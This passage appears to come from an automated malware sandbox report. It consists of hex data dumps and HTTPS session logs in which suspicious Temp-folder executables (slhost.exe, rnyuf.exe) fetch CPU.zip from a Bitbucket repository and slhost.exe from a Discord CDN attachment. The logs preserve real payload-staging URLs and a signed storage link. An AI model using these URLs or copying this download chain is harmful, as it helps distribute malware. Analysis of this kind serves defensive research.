                                                                                                                                                                                2021-11-11 11:26:10 UTC6168INData Raw: e9 00 0b 3d ca 98 39 b1 41 52 00 50 f3 32 9f df 80 70 b7 00 7c af e7 18 0a ab ec d3 00 a2 67 b1 5d 74 39 57 fb 07 d8 64 70 5c d2 30 5b 29 8a c1 00 c2 bf 10 9c b6 b4 1b 14 00 75 59 81 98 da 7c 26 d5 fb fc 50 05 00 0a 3f 62 3a b7 68 c9 95 3c ce 93 58 2f 00 01 24 34 5d 21 92 03 c7 76 64 f7 67 95 90 7a d8 d9 42 00 bb 41 6d a6 1e af 3f c3 1e 3a 1d 25 80 c1 e8 cf ed 9f fe 00 e1 78 7a 49 46 fb 3f 21 00 10 ba 32 aa 67 e5 e3 6f 00 5f c2 a2 8a a5 ef 5c 2d 00 a4 c1 b0 32 0a 71 4e e5 1c 59 e7 8d 03 5b bd 58 9b d8 54 76 e2 17 a8 c1 3c 00 96 dd 4a 72 41 ea 2c 3a af 7f 00 05 34 58 e0 b4 03 00 e2 17 d1 ee a5 57 55 2c 00 4c a0 7e f4 df 5d 44 ed 58 59 0d 7e 00 04 74 d7 32 9c 9e fe c4 00 15 03 e1 a0 1f ca 92 7b 73 e2 05 69 db 74 a1 d4 c3 be 39 b8 c9 29 68 01 3f 13 64 d2 0c
                                                                                                                                                                                Data Ascii: =9ARP2p|g]t9Wdp\0[)uY|&P?b:h<X/$4]!vdgzBAm?:%xzIF?!2go_\-2qNY[XTv<JrA,:4XWU,L~]DXY~t2{sit9)h?d
                                                                                                                                                                                2021-11-11 11:26:10 UTC6184INData Raw: f1 97 93 37 21 c0 8d 86 35 c7 00 04 1a 22 b5 7d 80 ed fd 00 e0 fb 76 f7 5b 45 6c 42 1e 14 19 f6 c0 5a df aa cc 98 99 00 6a 40 1a b5 48 fb ac 69 00 c7 b4 c0 63 e0 90 7c a9 00 24 23 f0 58 4b f5 91 60 00 5d a6 b6 92 fd 89 48 bd 00 3d 39 44 a8 7e e5 e3 25 00 ec 0b 6f cc 43 c7 de 88 00 6e dc 40 9a f5 af 8e 86 00 2a 4d ef d6 19 77 7e 1c 00 21 59 20 bb 5b 22 fb f4 77 41 fc c6 07 9c c0 85 89 26 40 0c 9d e5 16 2e b7 0f 0c 00 33 47 52 17 cb c8 b8 76 00 e8 f9 0d fa 34 66 7a 0b 2c fc 2f 1a 1d 4b c7 d2 ce 2c a1 9d 0c 8b f8 29 a5 00 43 73 e7 d1 34 be 2e ca 0b 0a 46 b7 3c dd 01 49 f6 d6 bf 30 a1 1c 71 b2 00 25 e5 06 d3 33 98 7a 31 73 da 07 d1 09 54 e8 1e e0 7f 9c 88 d2 0e 75 9a db bd 43 7a e2 c9 88 85 5b 04 00 7b cf 59 0c 5e 2c e8 65 1f f7 2f 44 c0 05 83 d9 74 39 e1 01
                                                                                                                                                                                Data Ascii: 7!5"}v[ElBZj@Hic|$#XK`]H=9D~%oCn@*Mw~!Y ["wA&@.3GRv4fz,/K,)Cs4.F<I0q%3z1sTuCz[{Y^,e/Dt9
                                                                                                                                                                                2021-11-11 11:26:10 UTC6200INData Raw: fe 61 13 d8 cd f6 93 00 8a b7 64 f9 ee 92 2a 56 00 c9 3d 5e 9c 9a bc 54 0d 00 30 8e fc 88 15 f8 32 d4 00 fe e0 55 92 f2 13 69 42 00 3e a0 2a 58 b7 8c 78 01 00 21 fb a6 4e d3 52 e9 e6 38 6a 72 80 2a 29 89 a2 e8 d2 dc 00 a4 36 21 28 c4 d1 67 3a 00 56 06 9c 16 f6 52 5c 68 01 59 fe 84 10 2a c8 57 80 ce be a1 1d 69 60 0c 07 09 3f bb bc 97 30 ee 0f 0d cd 72 b7 05 66 cc 6e e7 c9 c0 fa 44 5c 16 07 e9 48 fa 81 c4 eb 07 65 a6 00 84 ae 79 04 03 ed 10 78 f7 22 17 88 92 7e 5d fa 2a 01 b2 7a 67 0d 19 33 0b 80 98 44 4a ec 46 ab 6b 00 6a 18 22 50 e8 24 ac 99 00 f8 0f 86 1b de cf 2e 0a 00 d5 98 62 93 28 f5 bb e4 14 c7 ae dd 92 00 4a 44 aa c8 52 df 2c 00 b5 9c d5 51 fd 70 c4 86 07 c2 31 09 ad fb 20 5b 61 52 e5 00 3c 13 c3 10 be 03 30 2b 00 90 ab 3e 4b bb 16 ee 5d 00 7b e7
                                                                                                                                                                                Data Ascii: ad*V=^T02UiB>*Xx!NR8jr*)6!(g:VR\hY*Wi`?0rfnD\Heyx"~]*zg3DJFkj"P$.b(JDR,Qp1 [aR<0+>K]{
                                                                                                                                                                                2021-11-11 11:26:10 UTC6216INData Raw: 26 82 4f 9b a1 00 bc a3 18 5b ef 97 43 c9 00 c4 02 0f ac 4d 65 32 e6 33 83 5e f6 03 db 89 88 91 de a2 00 40 fd 39 a1 4f 9f 12 0d 00 eb 5b 2d 75 d4 f8 a3 72 90 37 00 9b 0a 4d 28 80 f1 20 aa 00 d1 52 22 db 92 27 26 42 01 39 9b 95 2c 0c 2f 2a f4 7d ae 00 ea f1 47 be 3f b9 f7 ce 02 72 17 b7 20 12 ba d7 60 e9 e9 4e 00 02 6d 41 28 fd 2c ee 14 00 8d b1 b8 8a 19 b0 43 a7 ec f5 00 c2 72 44 b2 e4 e5 a4 37 00 34 03 48 93 7f bc 1c d3 00 6f 76 01 13 b0 28 bb c2 00 14 1b 37 aa a5 54 7b d3 e2 3a 00 c1 53 9a 04 8c 5f 98 17 39 4b c8 83 1d e0 a3 99 bf 88 94 15 8a 26 5d 82 6d 0f 0c 26 00 aa 31 72 a1 c9 00 ba 0f bf 90 a7 4c b2 7b 00 e2 a0 d8 c7 8b ac 5d 54 1e eb e7 e9 c2 2e a9 6e 1e 60 ac 25 0f f6 22 7e 47 03 37 70 17 d7 f0 9d d0 3d 66 79 01 2f 7e b0 8d d8 cc b5 d4 4c 77 00
                                                                                                                                                                                Data Ascii: &O[CMe23^@9O[-ur7M( R"'&B9,/*}G?r `NmA(,CrD74Hov(7T{:S_9K&]m&1rL{]T.n`%"~G7p=fy/~Lw
                                                                                                                                                                                2021-11-11 11:26:10 UTC6232INData Raw: 11 13 89 cd ad 97 cf 17 07 b1 9b 65 82 62 57 bc e9 00 9a 14 1c f0 bd 00 39 ec 74 9d a5 d9 36 8c e4 11 00 28 75 2f 1e d8 f2 78 a0 00 40 b0 cc 4f e8 5d 38 64 90 25 00 ea 89 81 2e 1a a5 72 6b 0e b3 66 5f a9 e0 50 4e 9b 69 7c 00 f5 d3 ac db bf 9e be 99 c1 18 0a 48 3f de fc 4c 12 00 46 a9 b6 5d 8d 59 29 77 17 b3 aa 1d 00 d7 15 81 71 de 84 00 e3 20 1f e5 d4 b1 c4 3c 00 b6 0f 2b f8 1c 59 a0 f5 07 26 e2 10 fd 0e 10 1a 45 15 6f 7d 4c ec b1 00 a4 a5 e4 9c 88 6d e9 22 01 12 30 7c aa f0 b7 ce e0 5a 1e 03 46 e5 e4 4f 27 3d 81 24 30 fc db dc 3d 2e cb 00 03 bd 80 74 42 f1 c8 00 65 36 d3 b6 2d 87 23 2b 00 63 79 a3 d1 ee ab 51 9f 00 49 53 15 59 41 ca b5 81 00 77 fc 3d b7 f6 18 f7 0c 1d 94 83 3c 00 a9 f5 b1 66 23 8a 00 cd 7f 72 0f 67 d9 f3 ac 03 44 c9 8d 13 5a d2 89 f4 6b
                                                                                                                                                                                Data Ascii: ebW9t6(u/x@O]8d%.rkf_PNi|H?LF]Y)wq <+Y&Eo}Lm"0|ZFO'=$0=.tBe6-#+cyQISYAw=<f#rgDZk
                                                                                                                                                                                2021-11-11 11:26:10 UTC6248INData Raw: 09 a7 9d f9 ad a1 e4 ce 00 7f 02 53 cb e8 f3 ae 12 00 d2 44 73 14 34 ee b6 ce e8 b3 00 45 7a d1 3e 26 60 d4 e8 00 a8 e9 69 d7 97 84 66 98 00 18 31 0d f8 d8 45 cf 68 00 7f a2 23 4e 0e 79 e1 0c 00 7b 35 bc 24 2e 94 66 38 1d c7 7e 33 c1 fc ee b5 b0 07 e8 1a d5 03 20 d3 3e 4b c6 9f e8 76 d2 dd 00 54 f8 34 41 17 5c f0 b9 3d 22 24 82 f1 37 bb 60 23 60 8f 36 42 00 12 1e 17 2d 3b db 84 a3 00 c9 90 d2 e9 f9 7f a6 b3 00 1f 2e e3 e1 38 3f 21 7a 00 60 e6 93 01 f2 49 cb ab 00 15 5f b3 0c 25 29 07 6b 0b f4 06 b8 e0 78 0b 00 75 3e 7e ab 1e 3f e6 53 0e 5e 64 6f 28 2e 9a a0 33 77 10 f9 85 00 36 70 ab 32 05 e0 3d 13 00 91 3c cd d7 4f 8e f6 b4 00 41 07 b6 df 64 c2 50 de 00 68 aa f5 a7 e2 a9 81 a5 00 45 4a 39 e1 37 64 ac ef e8 f0 00 a6 59 89 09 2a 97 d8 b4 00 f9 26 9d 68 b3
                                                                                                                                                                                Data Ascii: SDs4Ez>&`if1Eh#Ny{5$.f8~3 >KvT4A\="$7`#`6B-;.8?!z`I_%)kxu>~?S^do(.3w6p2=<OAdPhEJ97dY*&h
                                                                                                                                                                                2021-11-11 11:26:10 UTC6264INData Raw: 54 cc 11 7d f9 48 3c 80 cf 11 aa 97 76 98 11 53 d6 0c 22 d8 20 58 95 20 50 82 80 08 48 96 93 38 20 08 24 1a 98 18 b3 31 1c 1f 11 81 99 2d 11 a8 84 8b 11 c9 9a ac 8c 31 cc c4 11 e2 9b e3 e0 31 e4 11 1b 9f 35 bc 98 31 34 11 2a a0 d9 91 19 2c 99 11 dd 09 9c 88 19 14 a1 1d b9 2c 00 c6 bc 11 2a 0c a2 cc 41 82 03 08 b4 32 09 ec 19 dc 22 9b a3 4c d4 62 c4 11 02 a5 eb bc 33 31 04 11 be e4 98 e0 c0 c4 11 35 a6 9d 14 8c 11 61 a8 61 83 81 6c 9f 11 95 29 18 18 98 11 42 a9 ab c0 37 31 44 11 bf 93 99 5c 8a 11 59 aa e8 b3 31 5c 12 11 1d ad 63 a4 20 33 11 bc 09 54 44 30 08 35 66 af 08 88 19 6e 38 11 0c b1 08 68 d1 18 08 1b 8d b2 91 31 19 90 11 a5 b5 75 30 98 19 a8 11 3e b6 ba 78 cd 19 40 11 d1 b8 8f 08 28 84 95 08 13 73 b9 59 28 19 74 9f 11 92 24 74 c6 94 11 36 ef bc 51
                                                                                                                                                                                Data Ascii: T}H<vS" X PH8 $1-11514*,,*A2"Lb315aal)B71D\Y1\c 3TD05fn8h1u0>x@(sY(t$t6Q
                                                                                                                                                                                2021-11-11 11:26:10 UTC6280INData Raw: 70 cc 1b 02 da 79 ec 19 ac 2c e0 37 c7 56 00 98 97 9b d5 c8 e4 2a 83 79 c3 00 86 6b 90 91 f4 93 47 f8 00 d1 02 9b 99 20 a0 b4 8b 7a 78 00 7a 0b a6 18 3a ec f3 2a 00 d6 1d 29 74 06 f2 2e e3 00 33 27 c9 e8 62 0c 9e 3a 0a bf 75 0a 10 b3 1c b0 40 99 07 ee c7 3e 31 00 71 d2 bf 23 11 70 95 e1 00 0a 37 2e da 93 9d e6 a9 04 67 c5 fc 72 38 c0 73 97 2a 06 00 02 89 86 c2 5d 78 ed 8f 00 0c 67 79 65 75 eb 12 d5 01 5b f4 b2 21 6e f3 13 20 87 ee 7b 99 00 9a 2b 86 95 79 c9 17 8a 00 20 39 8c 97 2e 2c 5e 5d 16 e3 d5 15 0b 48 dd 00 87 b9 db 51 9b 0f 72 ef c5 54 8e 18 c0 8f 34 b2 3e 63 00 29 b6 91 82 6f c0 1a 20 77 f3 00 80 f0 61 44 db 7a a6 02 39 52 a1 9d 15 74 85 4e 9c a9 c0 62 95 c4 c6 fe d4 70 6a 00 14 3f e6 d1 50 83 79 a8 00 b8 74 bf 26 76 c1 4e c5 07 8f 49 a3 1b 56 21
                                                                                                                                                                                Data Ascii: py,7V*ykG zxz:*)t.3'b:u@>1q#p7.gr8s*]xgyeu[!n {+y 9.,^]HQrT4>c)o waDz9RtNbpj?Pyt&vNIV!
                                                                                                                                                                                2021-11-11 11:26:10 UTC6296INData Raw: b0 5e 18 a9 1e 5b 00 dd 86 f7 a4 df 02 b6 a5 01 9a ed fa 4e 96 1d a1 e9 c8 ec e3 6d 00 15 3f 92 bb 59 63 c5 c1 17 1f 69 bc 07 0f db fe 93 40 6b e8 31 dc 34 00 7e eb 4d ed df f1 39 74 00 e7 42 59 1c 24 2d 84 36 ee ac 3b e2 fe 80 0e af aa b2 39 dc d0 39 91 2a 0e 31 15 55 a0 68 4b 51 fe 86 00 1b 32 ec 4d a4 a3 f6 80 00 58 97 28 e6 0c 70 d6 da 00 6b 79 57 c4 94 fe 93 0e 0e 55 17 75 dd 20 49 26 85 df 76 fa 4c 00 1a 0c a2 de b1 22 8f 60 00 38 b4 aa 12 bf 37 f3 18 00 c4 ac f1 46 b6 9d b0 e3 00 f2 4a d1 f9 3b 85 74 67 74 eb 00 1e 9b 7d ab 07 be 06 e5 00 e9 0d a5 54 e4 03 05 c8 00 5e 92 98 e8 55 b0 3b 33 7a 0a 00 1a d7 7b 1b 9e 3f 53 7c 00 ac 7f e5 c3 3b 51 6e a8 1d 6f 67 97 c0 04 bc 96 b3 7a d4 00 b4 da a7 c4 98 8e ea 65 39 5f 0b 03 9d 14 a2 59 d2 90 3b 56 f9 3e
                                                                                                                                                                                Data Ascii: ^[Nm?Yci@k14~M9tBY$-6;99*1UhKQ2MX(pkyWUu I&vL"`87FJ;tgt}T^U;3z{?S|;Qnogze9_Y;V>
                                                                                                                                                                                2021-11-11 11:26:10 UTC6312INData Raw: 1f b0 1c aa b9 00 2a a8 9d 4c 88 d4 f7 8f 05 4f f1 71 87 2b 90 2b c8 41 1b 00 08 28 d3 03 3b ca cb 17 0e c4 f9 8e 2c 03 5a f6 fe 80 d6 62 79 00 b0 e2 63 14 7c 9b 69 f7 01 c8 88 aa 07 a2 38 f9 21 f6 e4 ef bc 00 df d4 d2 05 af 9c b4 b6 00 31 cf 54 f9 64 cc fe 45 00 44 98 f7 a9 9e 4d d0 df 00 49 ba bb 21 3f 11 89 d2 00 37 1a dc 5c 35 25 50 4b e4 c5 76 66 0f 08 52 3d 44 e0 b7 2b e9 89 b5 18 6d 99 2f da 24 b6 01 8a b2 a2 5a 8e d2 9f d8 86 22 00 34 38 ab fa 3f 15 37 20 01 f5 74 9d 57 81 4f c7 c1 84 d0 a5 fe 01 d8 43 3e df f4 eb 02 cc 2c 6e 00 6b ae 99 b9 21 82 c1 08 00 2a 6f 28 45 56 87 e8 dd 1e d9 10 09 5e 0e 00 c5 2f 47 91 4b 89 04 b3 14 25 97 ed 80 e0 be f3 4a 00 c0 33 f9 65 58 9b b9 68 00 ae 2c 29 d1 45 e6 7d 88 0a 50 36 60 2a 9e 00 3b ef 8f 09 ea 01 07 f7
                                                                                                                                                                                Data Ascii: *LOq++A(;,Zbyc|i8!1TdEDMI!?7\5%PKvfR=D+m/$Z"48?7 tWOC>,nk!*o(EV^/GK%J3eXh,)E}P6`*;
                                                                                                                                                                                2021-11-11 11:26:10 UTC6328INData Raw: ed b1 eb 00 cf 20 4d 82 ce 10 3f 14 00 f7 78 60 7b 4a 9b 7d 1c 3b b2 88 00 fe 89 3b 9a f4 0a d2 03 d9 b6 cd 6d 12 9e 88 b4 6e 3e 1d b7 e1 78 af 00 78 7b 2c 2d 3a 0c 86 fb 51 9b 54 27 7d e7 1f 44 75 70 00 38 21 37 6a b0 c7 00 a1 36 c3 b3 7d b9 e2 1d 0b 69 e5 a6 3b 80 88 ad f7 89 2c 3e 91 61 80 71 6e db f6 5e 33 9d 00 32 fb ef 40 b9 a4 de 5c 00 83 04 58 d9 0b da 79 95 00 b1 33 cc d0 38 99 98 64 17 91 73 0d 04 f8 dc 1e fb 80 d8 ae ca ec 00 13 7e 39 58 79 3e 08 d9 03 07 5b dd b4 73 1a 80 5e 0e eb 01 e2 12 e7 16 1d 68 b3 6f a0 38 37 00 b9 ba 0b 57 15 5c c7 31 3f f7 24 00 bf 66 de a3 5e f1 89 00 ab b9 a6 3d 8b c1 70 4a 00 02 24 72 17 27 3b 01 7c 70 33 1d 85 fc f8 80 07 3c dd 86 45 ec 3d 2a ce 83 99 93 19 65 e4 d0 8b 67 69 00 ed 62 6d 17 91 3b 98 dc 90 47 00 e7
                                                                                                                                                                                Data Ascii: M?x`{J};;mn>xx{,-:QT'}Dup8!7j6}i;,>aqn^32@\Xy38ds~9Xy>[s^ho87W\1?$f^=pJ$r';|p3<E=*egibm;G
                                                                                                                                                                                2021-11-11 11:26:10 UTC6344INData Raw: 74 36 f3 b3 ee 35 1d b1 46 59 00 5a 53 88 17 ef 4e 00 fb e9 a9 da a2 09 31 e5 00 02 2c 7f 39 e8 cb 41 7c 00 bb 26 28 c2 3a 6a 53 e7 07 35 25 9a be 5b 30 8f 60 19 16 00 fc 4e c8 88 8c 96 99 b5 00 e7 32 ab 3f 6b 0d ec 9b 17 83 b0 14 03 5e 3c 11 af 88 ba 1f ce 07 61 fd f0 5f d8 70 6f 5e 94 d6 90 4d 00 cd 52 8f e8 05 6a 48 c2 e4 4c 00 80 a0 65 de 85 77 64 39 1c df 7d a7 c0 3f 57 74 da 69 04 00 b8 66 fa 85 ce 4c fe 76 17 59 c0 e7 04 f6 6e 62 c3 d0 b9 c7 91 e0 32 cd ee 40 dd 43 a6 3c be 9a 80 ea c1 95 ef 50 b6 f4 07 c6 dd 81 61 11 40 2c 1b 98 2a 07 a9 88 c2 57 9d 10 7c f3 1a ab 00 50 73 0c 4a ca a2 1b 76 00 6d f2 90 01 1d 45 10 b7 00 bd 68 48 e1 c8 95 39 4d 00 dd c3 fd 2e 31 01 eb 08 00 8d d9 88 13 10 1e 0a ca 00 50 3c 07 d2 f7 3d ec 26 fc 46 1f 31 77 68 43 a5
                                                                                                                                                                                Data Ascii: t65FYZSN1,9A|&(:jS5%[0`N2?k^<a_po^MRjHLewd9}?WtifLvYnb2@C<Pa@,*W|PsJvmEhH9M.1P<=&F1whC


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                10192.168.2.549815104.192.141.1443C:\Users\user\AppData\Local\Temp\slhost.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                2021-11-11 11:26:59 UTC9825OUTGET /tilttilttilt/test1/downloads/CPU.zip HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                UA-CPU: AMD64
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                Host: bitbucket.org
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                2021-11-11 11:26:59 UTC9825INHTTP/1.1 302 Found
                                                                                                                                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://d301sr5gafysq2.cloudfront.net; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com https://d301sr5gafysq2.cloudfront.net; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net sentry.io bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net; object-src about:; base-uri 'self'
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                X-Usage-Quota-Remaining: 998656.872
                                                                                                                                                                                Vary: Accept-Language, Origin
                                                                                                                                                                                X-Usage-Request-Cost: 1361.20
                                                                                                                                                                                Cache-Control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                X-B3-TraceId: fb5dbd37f36d56e1
                                                                                                                                                                                X-Usage-Output-Ops: 0
                                                                                                                                                                                X-Dc-Location: Micros
                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:26:59 GMT
                                                                                                                                                                                X-Usage-User-Time: 0.027654
                                                                                                                                                                                X-Usage-System-Time: 0.013182
                                                                                                                                                                                Location: https://bbuseruploads.s3.amazonaws.com/e8466680-8c82-495b-9e3c-2c79f82869ce/downloads/7737de24-30d9-4daf-b72b-bce98dc0f6f9/CPU.zip?Signature=3Tzq39O6DbHYG0DRC9lAn6yjoV4%3D&Expires=1636631244&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=rNhERZ1bRKwlh0QCY62w5KsnWg9_i2WQ&response-content-disposition=attachment%3B%20filename%3D%22CPU.zip%22
                                                                                                                                                                                X-Served-By: be7f0adbb6a0
                                                                                                                                                                                Expires: Thu, 11 Nov 2021 11:26:59 GMT
                                                                                                                                                                                Content-Language: en
                                                                                                                                                                                X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                                                X-Static-Version: a4fadf181312
                                                                                                                                                                                X-Render-Time: 0.062059879303
                                                                                                                                                                                Connection: close
                                                                                                                                                                                X-Usage-Input-Ops: 0
                                                                                                                                                                                X-Request-Count: 2247
                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                X-Version: a4fadf181312
                                                                                                                                                                                X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                11192.168.2.549846104.192.141.1443C:\Users\user\AppData\Local\Temp\slhost.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                2021-11-11 11:27:08 UTC9827OUTGET /tilttilttilt/test1/downloads/CPU.zip HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                UA-CPU: AMD64
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                Host: bitbucket.org
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                2021-11-11 11:27:08 UTC9828INHTTP/1.1 302 Found
                                                                                                                                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://d301sr5gafysq2.cloudfront.net; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com https://d301sr5gafysq2.cloudfront.net; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net sentry.io bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net; object-src about:; base-uri 'self'
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                X-Usage-Quota-Remaining: 999260.021
                                                                                                                                                                                Vary: Accept-Language, Origin
                                                                                                                                                                                X-Usage-Request-Cost: 752.20
                                                                                                                                                                                Cache-Control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                X-B3-TraceId: 5bf57967fd836a98
                                                                                                                                                                                X-Usage-Output-Ops: 0
                                                                                                                                                                                X-Dc-Location: Micros
                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:27:08 GMT
                                                                                                                                                                                X-Usage-User-Time: 0.022566
                                                                                                                                                                                X-Usage-System-Time: 0.000000
                                                                                                                                                                                Location: https://bbuseruploads.s3.amazonaws.com/e8466680-8c82-495b-9e3c-2c79f82869ce/downloads/7737de24-30d9-4daf-b72b-bce98dc0f6f9/CPU.zip?Signature=3Tzq39O6DbHYG0DRC9lAn6yjoV4%3D&Expires=1636631244&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=rNhERZ1bRKwlh0QCY62w5KsnWg9_i2WQ&response-content-disposition=attachment%3B%20filename%3D%22CPU.zip%22
                                                                                                                                                                                X-Served-By: 9715242173fb
                                                                                                                                                                                Expires: Thu, 11 Nov 2021 11:27:08 GMT
                                                                                                                                                                                Content-Language: en
                                                                                                                                                                                X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                                                X-Static-Version: a4fadf181312
                                                                                                                                                                                X-Render-Time: 0.0422880649567
                                                                                                                                                                                Connection: close
                                                                                                                                                                                X-Usage-Input-Ops: 0
                                                                                                                                                                                X-Request-Count: 3503
                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                X-Version: a4fadf181312
                                                                                                                                                                                X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                12192.168.2.549848162.159.135.233443C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                2021-11-11 11:27:09 UTC9830OUTGET /attachments/878034206570209333/908097655173947432/slhost.exe HTTP/1.1
                                                                                                                                                                                Host: cdn.discordapp.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                2021-11-11 11:27:09 UTC9830INHTTP/1.1 200 OK
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:27:09 GMT
                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                Content-Length: 3731093
                                                                                                                                                                                Connection: close
                                                                                                                                                                                CF-Ray: 6ac72b742f684a92-FRA
                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                Age: 52225
                                                                                                                                                                                Cache-Control: public, max-age=31536000
                                                                                                                                                                                Content-Disposition: attachment;%20filename=slhost.exe
                                                                                                                                                                                ETag: "7663a0f9957107e7ef91c493a3c85261"
                                                                                                                                                                                Expires: Fri, 11 Nov 2022 11:27:09 GMT
                                                                                                                                                                                Last-Modified: Wed, 10 Nov 2021 20:55:52 GMT
                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                                                                Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                x-goog-generation: 1636577752746880
                                                                                                                                                                                x-goog-hash: crc32c=m0CsxQ==
                                                                                                                                                                                x-goog-hash: md5=dmOg+ZVxB+fvkcSTo8hSYQ==
                                                                                                                                                                                x-goog-metageneration: 1
                                                                                                                                                                                x-goog-storage-class: STANDARD
                                                                                                                                                                                x-goog-stored-content-encoding: identity
                                                                                                                                                                                x-goog-stored-content-length: 3731093
                                                                                                                                                                                X-GUploader-UploadID: ADPycdtzHVvlw5XVUMDFxEdqMLofS1RRB2tAZVtKwS9snozqeFJGOKJuI78Yfpod3_GhOWWub_2KkeaGUv4a00WlL1k
                                                                                                                                                                                X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                                2021-11-11 11:27:09 UTC9831INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 63 25 32 42 39 35 73 4a 4f 43 57 6f 77 54 30 37 69 4d 4b 61 45 25 32 46 42 58 25 32 46 75 71 51 6c 55 4f 35 5a 41 33 62 58 6f 76 4c 41 56 79 78 47 5a 6e 58 79 30 55 70 61 78 35 58 25 32 42 48 47 47 56 65 30 6a 49 6b 70 79 55 78 54 33 58 6d 77 33 7a 66 66 72 54 39 6e 48 39 64 33 25 32 46 4e 37 75 6e 35 64 34 62 67 4a 68 4e 62 54 6c 74 4f 30 7a 6a 4e 4c 25 32 46 4c 54 62 72 71 6d 73 31 58 75 6f 61 6e 39 6a 74 37 71 66 49 78 6e 4d 43 67 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78
                                                                                                                                                                                Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=c%2B95sJOCWowT07iMKaE%2FBX%2FuqQlUO5ZA3bXovLAVyxGZnXy0Upax5X%2BHGGVe0jIkpyUxT3Xmw3zffrT9nH9d3%2FN7un5d4bgJhNbTltO0zjNL%2FLTbrqms1Xuoan9jt7qfIxnMCg%3D%3D"}],"group":"cf-nel","max
